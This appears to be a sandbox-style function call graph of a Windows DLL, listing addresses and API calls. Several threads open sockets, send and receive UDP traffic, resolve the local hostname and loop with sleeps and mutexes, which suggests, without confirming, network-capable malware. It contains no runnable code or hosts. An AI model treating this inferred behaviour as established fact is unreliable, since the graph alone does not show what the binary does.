31993->31993 31994 10011419 ___DllMainCRTStartup 72 API calls 31993->31994 31995 100060ab Mailbox ___DllMainCRTStartup 31994->31995 32019 100075ef 31995->32019 31997 100060ca 32024 1001e093 31997->32024 32000 10015459 __EH_prolog 31999->32000 32001 10001d63 numpunct 69 API calls 32000->32001 32002 10015471 32001->32002 32003 10034410 __time64 GetSystemTimeAsFileTime 32002->32003 32004 10015480 32003->32004 32032 100342d6 32004->32032 32008 100342b3 68 API calls _rand 32009 1001548d 32008->32009 32009->32008 32011 10005c54 32009->32011 32038 10002fd7 69 API calls ___DllMainCRTStartup 32009->32038 32011->31950 32013 10009ef4 32012->32013 32014 10009ede 32012->32014 32015 10002f31 ___DllMainCRTStartup 69 API calls 32013->32015 32014->32013 32016 10009ee9 32014->32016 32017 10009ef2 ___DllMainCRTStartup 32015->32017 32039 1000316e 69 API calls 2 library calls 32016->32039 32017->31953 32040 1000e186 32019->32040 32021 10007604 32022 10007623 TerminateThread CloseHandle 32021->32022 32023 10007636 CreateThread 32021->32023 32022->32023 32023->31997 32068 1001d6d7 32023->32068 32025 1001e0a1 32024->32025 32026 1001e09c 32024->32026 32086 1001df6a 32025->32086 32027 1001e1a7 ___DllMainCRTStartup 16 API calls 32026->32027 32027->32025 32030 1001e0b6 CreateThread 32031 1001e0cc 32030->32031 32091 1001c9a2 32030->32091 32031->31946 32033 100416ee ____mb_cur_max_func 68 API calls 32032->32033 32034 10015486 32033->32034 32035 100342b3 32034->32035 32036 100416ee ____mb_cur_max_func 68 API calls 32035->32036 32037 100342b8 32036->32037 32037->32009 32038->32009 32039->32017 32041 1000e190 __EH_prolog 32040->32041 32042 10034410 __time64 GetSystemTimeAsFileTime 32041->32042 32043 1000e1b6 32042->32043 32044 100342d6 68 API calls 32043->32044 32045 1000e1bd 32044->32045 32046 100342b3 _rand 68 API calls 32045->32046 32047 1000e1c3 32046->32047 32048 10034410 __time64 GetSystemTimeAsFileTime 32047->32048 32049 1000e1cc __gmtime64_s 32048->32049 32050 10011419 ___DllMainCRTStartup 72 API calls 32049->32050 32051 1000e1fc 32050->32051 32052 10032fed _sprintf 104 API calls 32051->32052 32054 1000e22d Mailbox 32052->32054 32053 10001d63 69 API calls numpunct 32053->32054 32054->32053 32055 1000246e ___DllMainCRTStartup 200 API calls 32054->32055 32056 1000c15a ___DllMainCRTStartup 99 API calls 32054->32056 32057 10001e92 numpunct 69 API calls 32054->32057 32059 1001ba63 69 API calls ___DllMainCRTStartup 32054->32059 32062 10002d15 69 API calls ___DllMainCRTStartup 32054->32062 32064 1000e40a Mailbox ___DllMainCRTStartup 32054->32064 32065 1001c022 69 API calls 3 library calls 32054->32065 32066 1001445f 105 API calls 4 library calls 32054->32066 32067 10012d83 85 API calls 6 library calls 32054->32067 32055->32054 32058 1000e3f7 Sleep 32056->32058 32057->32054 32058->32054 32059->32054 32062->32054 32064->32021 32065->32054 32066->32054 32067->32054 32069 1001d706 socket 32068->32069 32080 1001d8f1 Mailbox 32068->32080 32070 1001d726 7 API calls 32069->32070 32071 1001d71b WSAGetLastError 32069->32071 32070->32071 32072 1001d7c5 __gmtime64_s 32070->32072 32071->32080 32073 10002d15 ___DllMainCRTStartup 69 API calls 32072->32073 32074 1001d7ef numpunct 32073->32074 32075 10003256 ___DllMainCRTStartup 69 API calls 32074->32075 32076 1001d80d 32075->32076 32077 10002d15 ___DllMainCRTStartup 69 API calls 32076->32077 32078 1001d817 numpunct 32077->32078 32079 10003256 ___DllMainCRTStartup 69 API calls 32078->32079 32084 1001d836 __gmtime64_s 32079->32084 32081 1001d853 recvfrom 32082 1001d875 WSAGetLastError 32081->32082 32083 1001d87d inet_ntoa 32081->32083 32082->32084 32083->32084 32084->32080 32084->32081 32085 1001d8c2 sendto 32084->32085 32085->32084 32087 1001dfc6 32086->32087 32088 1001df76 socket 32086->32088 32087->32030 32087->32031 32089 1001df91 setsockopt setsockopt 32088->32089 32090 1001df89 WSAGetLastError 32088->32090 32089->32087 32090->32087 32092 1001c9d1 htons inet_addr setsockopt 32091->32092 32102 1001d10d Mailbox 32091->32102 32093 1001ca37 __gmtime64_s 32092->32093 32094 10002d15 ___DllMainCRTStartup 69 API calls 32093->32094 32095 1001ca4e numpunct 32094->32095 32096 10003256 ___DllMainCRTStartup 69 API calls 32095->32096 32097 1001ca6f 32096->32097 32098 100022f0 ___DllMainCRTStartup 72 API calls 32097->32098 32120 1001caad 6 library calls 32098->32120 32099 1001cab5 Sleep 32099->32120 32100 1001d102 closesocket 32100->32102 32103 1001cb0c sendto 32103->32120 32104 1001ce7f recvfrom 32105 1001ceac WSAGetLastError 32104->32105 32104->32120 32105->32120 32106 1001cb4a inet_ntoa 32108 10001d63 numpunct 69 API calls 32106->32108 32108->32120 32109 1001d0d7 32118 1001d02c Mailbox 32109->32118 32135 10006146 32109->32135 32110 10002e39 69 API calls ___DllMainCRTStartup 32110->32120 32112 10003256 69 API calls ___DllMainCRTStartup 32112->32120 32113 1001d031 32114 10006146 472 API calls 32113->32114 32113->32118 32114->32118 32115 10002d15 69 API calls ___DllMainCRTStartup 32115->32120 32116 10001e92 numpunct 69 API calls 32116->32120 32117 1000c213 ___DllMainCRTStartup 81 API calls 32117->32120 32118->32100 32118->32102 32120->32099 32120->32103 32120->32104 32120->32106 32120->32109 32120->32110 32120->32112 32120->32113 32120->32115 32120->32116 32120->32117 32120->32118 32121 1001d06f 32120->32121 32126 1001e307 32120->32126 32129 1001df0d gethostname 32120->32129 32174 10010dd2 79 API calls 2 library calls 32120->32174 32122 10001e92 numpunct 69 API calls 32121->32122 32123 1001d084 32122->32123 32175 10006376 481 API calls 4 library calls 32123->32175 32176 1003496a 32126->32176 32130 1001df31 gethostbyname 32129->32130 32131 1001df2d 32129->32131 32130->32131 32132 1001df42 inet_ntoa 32130->32132 32131->32120 32133 1001df58 numpunct 32132->32133 32134 10001f26 numpunct 69 API calls 32133->32134 32134->32131 32136 10006150 __EH_prolog 32135->32136 32137 10006162 32136->32137 32138 10006257 32136->32138 32201 1001e124 32137->32201 32140 100062ca 32138->32140 32142 1001e0d0 478 API calls 32138->32142 32166 1000624a Mailbox 32138->32166 32144 100062e1 CreateThread 32140->32144 32145 100062f9 32140->32145 32141 10006185 32143 1001df0d 72 API calls 32141->32143 32147 10006274 32142->32147 32146 100061b5 32143->32146 32144->32145 32496 1001d91a 80 API calls 4 library calls 32144->32496 32156 10006330 32145->32156 32157 1000631f 32145->32157 32150 10034410 __time64 GetSystemTimeAsFileTime 32146->32150 32148 10006299 32147->32148 32149 1000627e 32147->32149 32263 100087e9 216 API calls 10 library calls 32148->32263 32151 10006297 32149->32151 32154 10001e92 numpunct 69 API calls 32149->32154 32152 100061bd 32150->32152 32158 1000e4e1 399 API calls 32151->32158 32205 10008c40 32152->32205 32154->32151 32265 1000bd40 113 API calls 3 library calls 32156->32265 32264 1000bcd6 112 API calls 3 library calls 32157->32264 32158->32140 32161 100062a4 Mailbox ___DllMainCRTStartup 32161->32151 32162 100061cf 32163 100061f3 32162->32163 32165 100061d8 Sleep 32162->32165 32162->32166 32216 1001e0d0 32162->32216 32167 10034410 __time64 GetSystemTimeAsFileTime 32163->32167 32165->32162 32166->32118 32171 100061f9 32167->32171 32168 10034410 __time64 GetSystemTimeAsFileTime 32168->32171 32169 1000623a 32223 1000e4e1 32169->32223 32171->32168 32171->32169 32172 1000c15a ___DllMainCRTStartup 99 API calls 32171->32172 32173 1000621d Sleep 32172->32173 32173->32171 32174->32120 32175->32118 32179 100348f5 32176->32179 32178 1001e31e 32178->32120 32180 100348fe 32179->32180 32183 10034913 32179->32183 32195 10037f1f 68 API calls __getptd_noexit 32180->32195 32182 10034954 32199 10037f1f 68 API calls __getptd_noexit 32182->32199 32183->32182 32186 10034921 32183->32186 32185 10034903 32196 1003b745 9 API calls __gmtime64_s 32185->32196 32197 10034714 99 API calls 2 library calls 32186->32197 32187 1003494c 32200 1003b745 9 API calls __gmtime64_s 32187->32200 32190 10034938 32193 10034964 32190->32193 32198 10037f1f 68 API calls __getptd_noexit 32190->32198 32191 1003490e 32191->32178 32193->32178 32195->32185 32196->32191 32197->32190 32198->32187 32199->32187 32200->32193 32202 1001e12e 32201->32202 32203 1001e139 TerminateThread CloseHandle 32202->32203 32204 1001e14c CreateThread 32202->32204 32203->32204 32204->32141 32266 1001d388 32204->32266 32206 10008c4a __EH_prolog 32205->32206 32207 10008c99 32206->32207 32208 10008c5d 32206->32208 32209 10008ca6 32207->32209 32293 1000930e 69 API calls ___DllMainCRTStartup 32207->32293 32211 10008c77 32208->32211 32291 1000930e 69 API calls ___DllMainCRTStartup 32208->32291 32210 10008c93 32209->32210 32294 1000a778 69 API calls ___DllMainCRTStartup 32209->32294 32210->32162 32211->32210 32292 1000a778 69 API calls ___DllMainCRTStartup 32211->32292 32217 1001e0da 32216->32217 32295 1001dfcb 32217->32295 32220 1001e11b 32220->32162 32221 1001e0f1 TerminateThread CloseHandle 32222 1001e104 CreateThread 32221->32222 32222->32220 32302 1001d145 32222->32302 32224 1000e7f8 ___DllMainCRTStartup 121 API calls 32223->32224 32225 1000e50a 32224->32225 32226 1000da3f ___DllMainCRTStartup 108 API calls 32225->32226 32227 1000e511 32226->32227 32228 10001d63 numpunct 69 API calls 32227->32228 32257 1000e644 Mailbox 32227->32257 32229 1000e529 32228->32229 32232 1000e543 32229->32232 32235 1000e4a3 ___DllMainCRTStartup 174 API calls 32229->32235 32230 1000e773 32233 1000e791 32230->32233 32234 1000e77b CreateThread 32230->32234 32231 1000e75d CreateThread 32231->32230 32326 1000d556 32231->32326 32236 1000e649 32232->32236 32241 1000e55d numpunct 32232->32241 32233->32166 32234->32233 32321 1000d52d 32234->32321 32235->32232 32317 1000db5e 149 API calls 4 library calls 32236->32317 32238 1000e654 32318 10015be6 69 API calls 2 library calls 32238->32318 32240 1000e5e1 32242 10002f31 ___DllMainCRTStartup 69 API calls 32240->32242 32243 1000e594 numpunct 32241->32243 32244 10001f26 numpunct 69 API calls 32241->32244 32245 1000e5f3 32242->32245 32243->32240 32246 10001f26 numpunct 69 API calls 32243->32246 32244->32243 32247 10002d15 ___DllMainCRTStartup 69 API calls 32245->32247 32248 1000e5b8 numpunct 32246->32248 32249 1000e602 32247->32249 32255 10001f26 numpunct 69 API calls 32248->32255 32251 100117aa ___DllMainCRTStartup 257 API calls 32249->32251 32250 1000e687 Sleep 32319 1000db5e 149 API calls 4 library calls 32250->32319 32254 1000e60d ___DllMainCRTStartup 32251->32254 32252 1000e71b CreateThread 32252->32257 32333 1000d124 254 API calls 7 library calls 32252->32333 32258 1000e626 Sleep 32254->32258 32259 1000e5d7 32255->32259 32256 1000e6c2 Mailbox 32256->32252 32257->32230 32257->32231 32258->32257 32261 1000c15a ___DllMainCRTStartup 99 API calls 32259->32261 32261->32240 32262 1000e665 Mailbox 32262->32250 32262->32256 32320 10015be6 69 API calls 2 library calls 32262->32320 32263->32161 32264->32166 32265->32166 32267 1001d3b7 32266->32267 32275 1001d6ae Mailbox 32266->32275 32268 10002d15 ___DllMainCRTStartup 69 API calls 32267->32268 32269 1001d3c4 numpunct 32268->32269 32270 10003256 ___DllMainCRTStartup 69 API calls 32269->32270 32271 1001d3e3 32270->32271 32272 10002d15 ___DllMainCRTStartup 69 API calls 32271->32272 32273 1001d3ed numpunct 32272->32273 32274 10003256 ___DllMainCRTStartup 69 API calls 32273->32274 32276 1001d40e 32274->32276 32276->32275 32277 1001d422 socket 32276->32277 32278 1001d44a htons setsockopt setsockopt setsockopt sendto 32277->32278 32279 1001d43a WSAGetLastError 32277->32279 32278->32279 32289 1001d4eb __gmtime64_s 32278->32289 32280 1001d69e Sleep 32279->32280 32280->32275 32280->32276 32281 1001d676 closesocket 32281->32280 32282 1001d528 recvfrom 32283 1001d670 WSAGetLastError 32282->32283 32284 1001d554 inet_ntoa 32282->32284 32283->32281 32284->32289 32285 1001d658 Sleep 32288 1001d61a Mailbox 32285->32288 32285->32289 32286 10001d63 numpunct 69 API calls 32286->32288 32288->32281 32288->32285 32288->32286 32290 10008baf 69 API calls ___DllMainCRTStartup 32288->32290 32289->32281 32289->32282 32289->32285 32289->32288 32290->32288 32291->32211 32292->32210 32293->32209 32294->32210 32296 1001dfe1 socket 32295->32296 32301 1001dfda 32295->32301 32297 1001e002 htons htonl setsockopt bind 32296->32297 32298 1001dff7 WSAGetLastError 32296->32298 32299 1001e053 WSAGetLastError 32297->32299 32300 1001e05b setsockopt setsockopt 32297->32300 32298->32301 32299->32301 32300->32301 32301->32220 32301->32221 32301->32222 32303 1001d371 32302->32303 32309 1001d174 __gmtime64_s Mailbox ___DllMainCRTStartup _memcmp numpunct 32302->32309 32304 1001d35e 32304->32303 32305 1001d364 closesocket 32304->32305 32305->32303 32306 1001d1ab recvfrom 32307 1001d1d4 WSAGetLastError 32306->32307 32306->32309 32307->32309 32308 10002d15 ___DllMainCRTStartup 69 API calls 32308->32309 32309->32304 32309->32306 32309->32308 32310 10003256 ___DllMainCRTStartup 69 API calls 32309->32310 32311 1001e307 99 API calls 32309->32311 32312 1001d2c8 sendto inet_ntoa 32309->32312 32314 1001d30d 32309->32314 32310->32309 32311->32309 32313 10001d63 numpunct 69 API calls 32312->32313 32313->32309 32316 10006376 481 API calls 4 library calls 32314->32316 32316->32309 32317->32238 32318->32262 32319->32262 32320->32262 32322 1000d53a 32321->32322 32323 1000d54f 32322->32323 32334 1000e8e3 32322->32334 32325 1000d541 Sleep 32325->32322 32328 1000d563 32326->32328 32327 1000d59c 32328->32327 32329 1000d56d WaitForSingleObject 32328->32329 32331 1000d587 ReleaseMutex 32328->32331 32332 1000d58e Sleep 32328->32332 32361 100145d5 32328->32361 32329->32328 32331->32332 32332->32328 32335 1000e8ed __EH_prolog 32334->32335 32336 10034410 __time64 GetSystemTimeAsFileTime 32335->32336 32338 1000e8ff 32336->32338 32337 1000e955 32339 1000ec02 32337->32339 32340 1000ec83 Mailbox 32337->32340 32344 1000eac5 32337->32344 32338->32337 32347 10007539 128 API calls 32338->32347 32341 10012592 75 API calls 32339->32341 32340->32325 32342 1000ec16 32341->32342 32343 10002d15 ___DllMainCRTStartup 69 API calls 32342->32343 32345 1000ec31 32343->32345 32344->32340 32346 10012342 72 API calls 32344->32346 32348 10002d15 ___DllMainCRTStartup 69 API calls 32345->32348 32349 1000eb14 32346->32349 32347->32337 32350 1000ec49 32348->32350 32351 10001d63 numpunct 69 API calls 32349->32351 32352 10009643 ___DllMainCRTStartup 69 API calls 32350->32352 32353 1000eb2d 32351->32353 32354 1000eb61 32352->32354 32355 10002d15 ___DllMainCRTStartup 69 API calls 32353->32355 32357 10011030 125 API calls 32354->32357 32356 1000eb45 32355->32356 32358 10009643 ___DllMainCRTStartup 69 API calls 32356->32358 32359 1000ec78 32357->32359 32358->32354 32359->32340 32360 10034410 __time64 GetSystemTimeAsFileTime 32359->32360 32360->32340 32363 100145df __EH_prolog 32361->32363 32362 1001516f 32362->32328 32363->32362 32364 100092ab 68 API calls 32363->32364 32372 10014666 _memmove 32364->32372 32365 1001476e htonl 32373 100147b1 _memmove 32365->32373 32432 100150dd Mailbox 32365->32432 32366 1001470a htonl 32366->32372 32366->32432 32367 10008c24 Mailbox 68 API calls 32367->32362 32368 10034410 __time64 GetSystemTimeAsFileTime 32470 10014769 Mailbox 32368->32470 32369 1000a435 68 API calls 32369->32372 32370 1001485c htonl htonl htonl htonl 32375 100148a0 _memmove 32370->32375 32370->32432 32371 10015d17 ___DllMainCRTStartup 68 API calls 32371->32372 32372->32365 32372->32366 32372->32369 32372->32371 32374 10008c24 Mailbox 68 API calls 32372->32374 32372->32432 32372->32470 32373->32370 32373->32432 32373->32470 32374->32372 32377 10014ad9 32375->32377 32378 1001490c 32375->32378 32375->32432 32472 10014c17 Mailbox ___DllMainCRTStartup 32375->32472 32488 10014fb0 Mailbox 32375->32488 32376 10001d63 numpunct 69 API calls 32379 10014ffd 32376->32379 32383 10001d63 numpunct 69 API calls 32377->32383 32381 10014915 32378->32381 32382 100149ee 32378->32382 32384 10001f26 numpunct 69 API calls 32379->32384 32380 10001f26 numpunct 69 API calls 32385 10014dcd 32380->32385 32390 10001d63 numpunct 69 API calls 32381->32390 32381->32470 32388 10001d63 numpunct 69 API calls 32382->32388 32386 10014ae6 32383->32386 32387 1001501f 32384->32387 32389 10001d63 numpunct 69 API calls 32385->32389 32391 10001f26 numpunct 69 API calls 32386->32391 32392 1001c022 69 API calls 32387->32392 32393 100149fb 32388->32393 32394 10014ddf 32389->32394 32395 10014929 32390->32395 32396 10014b08 32391->32396 32397 1001502e Mailbox 32392->32397 32398 10001f26 numpunct 69 API calls 32393->32398 32399 10001d63 numpunct 69 API calls 32394->32399 32400 10001f26 numpunct 69 API calls 32395->32400 32401 1001c022 69 API calls 32396->32401 32408 10001d63 numpunct 69 API calls 32397->32408 32402 10014a1d 32398->32402 32403 10014df3 32399->32403 32405 1001494a 32400->32405 32406 10014b17 32401->32406 32407 1001c022 69 API calls 32402->32407 32404 10001d63 numpunct 69 API calls 32403->32404 32410 10014e07 32404->32410 32411 1001c022 69 API calls 32405->32411 32416 10002d15 ___DllMainCRTStartup 69 API calls 32406->32416 32406->32470 32412 10014a2c 32407->32412 32409 10015052 32408->32409 32413 10002d15 ___DllMainCRTStartup 69 API calls 32409->32413 32414 10001d63 numpunct 69 API calls 32410->32414 32415 10014959 32411->32415 32419 10002d15 ___DllMainCRTStartup 69 API calls 32412->32419 32412->32470 32417 10015064 32413->32417 32418 10014e1b 32414->32418 32424 10002d15 ___DllMainCRTStartup 69 API calls 32415->32424 32415->32470 32420 10014b35 32416->32420 32421 1001445f 105 API calls 32417->32421 32422 10001d63 numpunct 69 API calls 32418->32422 32423 10014a56 32419->32423 32425 10002d15 ___DllMainCRTStartup 69 API calls 32420->32425 32426 1001507a 32421->32426 32427 10014e2f 32422->32427 32428 10002d15 ___DllMainCRTStartup 69 API calls 32423->32428 32429 10014977 32424->32429 32430 10014b47 32425->32430 32426->32432 32437 10002d15 ___DllMainCRTStartup 69 API calls 32426->32437 32433 1001ba63 ___DllMainCRTStartup 69 API calls 32427->32433 32434 10014a68 32428->32434 32435 10002d15 ___DllMainCRTStartup 69 API calls 32429->32435 32431 1001445f 105 API calls 32430->32431 32436 10014b5e 32431->32436 32432->32368 32432->32470 32438 10014e48 32433->32438 32439 1001445f 105 API calls 32434->32439 32440 10014989 32435->32440 32441 10002d15 ___DllMainCRTStartup 69 API calls 32436->32441 32442 100150b3 32437->32442 32443 1001ba63 ___DllMainCRTStartup 69 API calls 32438->32443 32444 10014a7c 32439->32444 32445 1001445f 105 API calls 32440->32445 32447 10014bab 32441->32447 32448 1001320b 72 API calls 32442->32448 32449 10014e5e 32443->32449 32453 10002d15 ___DllMainCRTStartup 69 API calls 32444->32453 32444->32470 32446 1001499d 32445->32446 32454 10002d15 ___DllMainCRTStartup 69 API calls 32446->32454 32446->32470 32450 10014268 80 API calls 32447->32450 32451 100150bf 32448->32451 32452 1001c022 69 API calls 32449->32452 32455 10014bb7 32450->32455 32451->32432 32463 10001e92 numpunct 69 API calls 32451->32463 32456 10014e6a 32452->32456 32457 10014a94 32453->32457 32458 100149b5 32454->32458 32459 10014bbf 32455->32459 32471 10014c95 ___DllMainCRTStartup numpunct 32455->32471 32462 10001d63 numpunct 69 API calls 32456->32462 32456->32470 32460 10013372 80 API calls 32457->32460 32461 10013b81 80 API calls 32458->32461 32465 10002f31 ___DllMainCRTStartup 69 API calls 32459->32465 32459->32472 32460->32470 32461->32470 32464 10014ece 32462->32464 32463->32432 32466 10002d15 ___DllMainCRTStartup 69 API calls 32464->32466 32465->32472 32467 10014ee6 32466->32467 32468 10002d15 ___DllMainCRTStartup 69 API calls 32467->32468 32469 10014ef8 32468->32469 32474 1001445f 105 API calls 32469->32474 32470->32367 32471->32472 32473 10014d54 numpunct 32471->32473 32475 10001f26 numpunct 69 API calls 32471->32475 32472->32380 32473->32472 32476 10001f26 numpunct 69 API calls 32473->32476 32477 10014f0f 32474->32477 32475->32473 32476->32472 32478 10002d15 ___DllMainCRTStartup 69 API calls 32477->32478 32477->32488 32479 10014f31 32478->32479 32480 10012d83 85 API calls 32479->32480 32481 10014f38 32480->32481 32482 10001d63 numpunct 69 API calls 32481->32482 32481->32488 32483 10014f49 32482->32483 32484 10002d15 ___DllMainCRTStartup 69 API calls 32483->32484 32485 10014f5e 32484->32485 32486 1000dd2b ___DllMainCRTStartup 174 API calls 32485->32486 32487 10014f6b 32486->32487 32487->32488 32489 10014f6f numpunct 32487->32489 32488->32376 32490 10003256 ___DllMainCRTStartup 69 API calls 32489->32490 32491 10014f85 32490->32491 32492 10002d15 ___DllMainCRTStartup 69 API calls 32491->32492 32493 10014f93 32492->32493 32494 100117aa ___DllMainCRTStartup 257 API calls 32493->32494 32495 10014f9c Sleep 32494->32495 32495->32488 32503 1000571b Mailbox 32497->32503 32498 10005822 32499 1000580e Sleep 32499->32503 32500 10005731 WaitForSingleObject 32500->32503 32502 10002d15 69 API calls ___DllMainCRTStartup 32502->32503 32503->32498 32503->32499 32503->32500 32503->32502 32505 100057ee ReleaseMutex 32503->32505 32513 10005839 69 API calls 2 library calls 32503->32513 32514 1000800d 111 API calls 8 library calls 32503->32514 32505->32503 32507 100056a4 32506->32507 32508 100056e9 32507->32508 32509 100056ae WaitForSingleObject 32507->32509 32511 100056c8 ReleaseMutex 32507->32511 32512 100056d8 Sleep 32507->32512 32515 10006695 32507->32515 32509->32507 32511->32507 32512->32507 32513->32503 32514->32503 32517 1000669f __chsize_nolock __EH_prolog 32515->32517 32516 100073fc 32516->32507 32517->32516 32673 1000a435 68 API calls _memmove 32517->32673 32519 1000671a 32674 1000a435 68 API calls _memmove 32519->32674 32521 10006737 32522 10006776 htonl htonl htonl htonl 32521->32522 32675 10008c24 68 API calls _free 32521->32675 32525 100067b5 __gmtime64_s _memmove 32522->32525 32524 10006768 32524->32522 32676 10008c24 68 API calls _free 32525->32676 32527 100067d4 32677 10008c24 68 API calls _free 32527->32677 32529 100067df 32678 100065aa 69 API calls numpunct 32529->32678 32531 100067f0 32532 10006800 32531->32532 32533 1000711c 32531->32533 32534 10006809 32532->32534 32541 10007044 ___DllMainCRTStartup 32532->32541 32535 10001d63 numpunct 69 API calls 32533->32535 32657 1000682b Mailbox ___DllMainCRTStartup 32533->32657 32538 10006830 32534->32538 32539 10006819 32534->32539 32587 10006a3b Mailbox ___DllMainCRTStartup 32534->32587 32537 1000713a 32535->32537 32542 10001d63 numpunct 69 API calls 32537->32542 32547 10001d63 numpunct 69 API calls 32538->32547 32538->32657 32539->32657 32679 10007539 128 API calls ___DllMainCRTStartup 32539->32679 32540 100073e1 Mailbox 32714 10008c24 68 API calls _free 32540->32714 32548 100070cc numpunct 32541->32548 32553 10001e92 numpunct 69 API calls 32541->32553 32544 1000714a 32542->32544 32543 10001d63 numpunct 69 API calls 32546 10006ace 32543->32546 32549 10001d63 numpunct 69 API calls 32544->32549 32551 10001d63 numpunct 69 API calls 32546->32551 32552 1000684a 32547->32552 32563 10001f26 numpunct 69 API calls 32548->32563 32554 10007160 32549->32554 32556 10006ae4 32551->32556 32557 10001d63 numpunct 69 API calls 32552->32557 32553->32548 32705 1001c022 69 API calls 3 library calls 32554->32705 32555 100073f1 32715 10008c24 68 API calls _free 32555->32715 32687 1001c022 69 API calls 3 library calls 32556->32687 32561 10006860 32557->32561 32680 1001c022 69 API calls 3 library calls 32561->32680 32564 100070f4 32563->32564 32703 10005839 69 API calls 2 library calls 32564->32703 32566 10006af9 Mailbox 32566->32657 32688 100082c8 69 API calls numpunct 32566->32688 32567 10007105 32704 100065e5 71 API calls 4 library calls 32567->32704 32568 10007175 Mailbox 32571 10001d63 numpunct 69 API calls 32568->32571 32568->32657 32569 10006872 Mailbox 32569->32657 32681 100082c8 69 API calls numpunct 32569->32681 32572 1000719f 32571->32572 32574 10002d15 ___DllMainCRTStartup 69 API calls 32572->32574 32577 100071b4 32574->32577 32575 10006b33 32581 10002d15 ___DllMainCRTStartup 69 API calls 32575->32581 32575->32657 32706 1001445f 105 API calls 4 library calls 32577->32706 32579 100068b5 32583 10002d15 ___DllMainCRTStartup 69 API calls 32579->32583 32579->32587 32580 100071c9 32580->32657 32707 10007442 99 API calls 2 library calls 32580->32707 32582 10006b4f 32581->32582 32585 10002d15 ___DllMainCRTStartup 69 API calls 32582->32585 32586 100068d1 32583->32586 32589 10006b64 32585->32589 32590 10002d15 ___DllMainCRTStartup 69 API calls 32586->32590 32587->32543 32587->32657 32588 100071e9 ___DllMainCRTStartup 32596 10001d63 numpunct 69 API calls 32588->32596 32689 1001445f 105 API calls 4 library calls 32589->32689 32592 100068e3 32590->32592 32682 1001445f 105 API calls 4 library calls 32592->32682 32593 10006b80 32598 10002d15 ___DllMainCRTStartup 69 API calls 32593->32598 32593->32657 32595 100068fe 32595->32587 32600 10002d15 ___DllMainCRTStartup 69 API calls 32595->32600 32597 1000721a 32596->32597 32708 1000765f 106 API calls 5 library calls 32597->32708 32599 10006bcf 32598->32599 32690 10008570 72 API calls 4 library calls 32599->32690 32602 10006947 32600->32602 32683 1000841a 108 API calls 5 library calls 32602->32683 32603 10006bdb 32607 10001d63 numpunct 69 API calls 32603->32607 32603->32657 32606 1000723b 32608 10001e92 numpunct 69 API calls 32606->32608 32609 10006bef 32607->32609 32610 10007269 32608->32610 32611 10002d15 ___DllMainCRTStartup 69 API calls 32609->32611 32616 100072b7 32610->32616 32709 10008d1d 69 API calls __EH_prolog 32610->32709 32614 10006c0b 32611->32614 32612 10006953 ___DllMainCRTStartup 32612->32587 32684 10007a69 72 API calls 4 library calls 32612->32684 32691 10008365 69 API calls 3 library calls 32614->32691 32619 10002d15 ___DllMainCRTStartup 69 API calls 32616->32619 32618 10006997 32621 10001e92 numpunct 69 API calls 32618->32621 32622 100072c8 32619->32622 32620 10006c15 32623 10006ee1 32620->32623 32666 10006c1d __gmtime64_s Mailbox ___DllMainCRTStartup _memmove 32620->32666 32624 10006a01 32621->32624 32710 10007918 72 API calls 5 library calls 32622->32710 32626 10001d63 numpunct 69 API calls 32623->32626 32627 10001e92 numpunct 69 API calls 32624->32627 32629 10006eef 32626->32629 32630 10006a23 32627->32630 32628 100072d8 32631 10001e92 numpunct 69 API calls 32628->32631 32632 10001d63 numpunct 69 API calls 32629->32632 32685 10005839 69 API calls 2 library calls 32630->32685 32635 10007345 numpunct 32631->32635 32636 10006f02 32632->32636 32634 10006a34 32686 100065e5 71 API calls 4 library calls 32634->32686 32641 10001f26 numpunct 69 API calls 32635->32641 32698 10007701 72 API calls 5 library calls 32636->32698 32639 10006f15 32699 10002d96 69 API calls numpunct 32639->32699 32640 10001e92 numpunct 69 API calls 32640->32666 32642 10007360 32641->32642 32711 10005839 69 API calls 2 library calls 32642->32711 32645 10007371 32712 100065e5 71 API calls 4 library calls 32645->32712 32646 10006f82 32700 10002d96 69 API calls numpunct 32646->32700 32649 10006fa0 32701 10005839 69 API calls 2 library calls 32649->32701 32651 10006deb _memmove 32654 10001f26 numpunct 69 API calls 32651->32654 32651->32657 32652 10006fb1 32702 100065e5 71 API calls 4 library calls 32652->32702 32653 10001f26 numpunct 69 API calls 32653->32666 32656 10006e41 32654->32656 32659 10002d15 ___DllMainCRTStartup 69 API calls 32656->32659 32713 10008c24 68 API calls _free 32657->32713 32658 10002d15 ___DllMainCRTStartup 69 API calls 32658->32666 32660 10006e56 32659->32660 32662 10001d63 numpunct 69 API calls 32660->32662 32661 10001d63 numpunct 69 API calls 32661->32666 32663 10006e65 32662->32663 32695 10007701 72 API calls 5 library calls 32663->32695 32666->32640 32666->32651 32666->32653 32666->32657 32666->32658 32666->32661 32692 10007701 72 API calls 5 library calls 32666->32692 32693 10005839 69 API calls 2 library calls 32666->32693 32694 100065e5 71 API calls 4 library calls 32666->32694 32667 10006e78 Mailbox ___DllMainCRTStartup 32696 10005839 69 API calls 2 library calls 32667->32696 32671 10006ea0 32697 100065e5 71 API calls 4 library calls 32671->32697 32673->32519 32674->32521 32675->32524 32676->32527 32677->32529 32678->32531 32679->32657 32680->32569 32681->32579 32682->32595 32683->32612 32684->32618 32685->32634 32686->32587 32687->32566 32688->32575 32689->32593 32690->32603 32691->32620 32692->32666 32693->32666 32694->32666 32695->32667 32696->32671 32697->32657 32698->32639 32699->32646 32700->32649 32701->32652 32702->32657 32703->32567 32704->32657 32705->32568 32706->32580 32707->32588 32708->32606 32709->32616 32710->32628 32711->32645 32712->32657 32713->32540 32714->32555 32715->32516 32716 100058bf 32717 100058c9 __EH_prolog 32716->32717 32718 10009203 ___DllMainCRTStartup RaiseException 32717->32718 32719 10005996 32718->32719 32720 10033888 std::_Facet_Register 69 API calls 32719->32720 32721 100059c8 32720->32721 32728 100059f9 32721->32728 32733 1001eac0 32721->32733 32726 10005a11 32727 10033888 std::_Facet_Register 69 API calls 32726->32727 32729 10005a4c 32727->32729 32756 1000d5a3 32728->32756 32731 10033888 std::_Facet_Register 69 API calls 32729->32731 32732 10005a99 32729->32732 32784 1003245c RaiseException std::exception::exception __CxxThrowException@8 32729->32784 32731->32729 32785 10025e20 32733->32785 32735 1001eb0b 32736 1001eb45 32735->32736 32737 1001eb25 GetNativeSystemInfo 32735->32737 32738 1001eb4a HeapCreate 32736->32738 32737->32738 32790 1001f7b0 HeapCreate 32738->32790 32743 1001ec36 32745 10033888 std::_Facet_Register 69 API calls 32743->32745 32744 10033984 _free 68 API calls 32744->32743 32746 100059de 32745->32746 32747 1001e420 HeapCreate 32746->32747 32836 1001f4d0 HeapCreate 32747->32836 32751 1001e4aa 32752 1001e4e2 32751->32752 32754 10033984 _free 68 API calls 32751->32754 32753 10033888 std::_Facet_Register 69 